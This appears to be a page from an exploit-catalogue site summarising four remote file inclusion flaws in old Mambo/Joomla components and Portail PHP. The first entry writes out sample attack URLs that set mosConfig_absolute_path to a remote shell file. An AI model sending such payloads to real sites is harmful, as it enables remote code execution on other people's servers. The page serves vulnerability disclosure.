header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

com_securityimages Mambo Remote File Include

This bug allows a remote attacker to execute commands via rfi. The vulnerable pages are client.php, configinsert.php, lang.php and server.php. The exploit can be executed by sending a malicious URL like http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt or http://web/components/com_securityimages/lang.php?mosConfig_absolute_path=http://shell.txt

Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability

Portail PHP v1.7 is vulnerable to a remote inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a parameter ‘chemin’ which points to a malicious script hosted on a remote server. When the vulnerable application processes the malicious URL, the malicious script is executed on the vulnerable server.

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

This vulnerability allows remote attackers to include arbitrary files from local resources. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'mosConfig_live_site' parameter in 'admin.a6mambohelpdesk.php' script. A remote attacker can send a specially crafted HTTP request with arbitrary file inclusion, which will be included and executed by the vulnerable script.

Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

A remote file inclusion vulnerability exists in Com Multibanners component for Joomla! CMS. The vulnerability is due to the 'extadminmenus.class.php' script not properly sanitizing user-supplied input to the 'mosConfig_absolute_path' parameter. This may allow a remote attacker to include a file from a remote host that contains arbitrary code and execute it in the context of the webserver process.

Recent Exploits: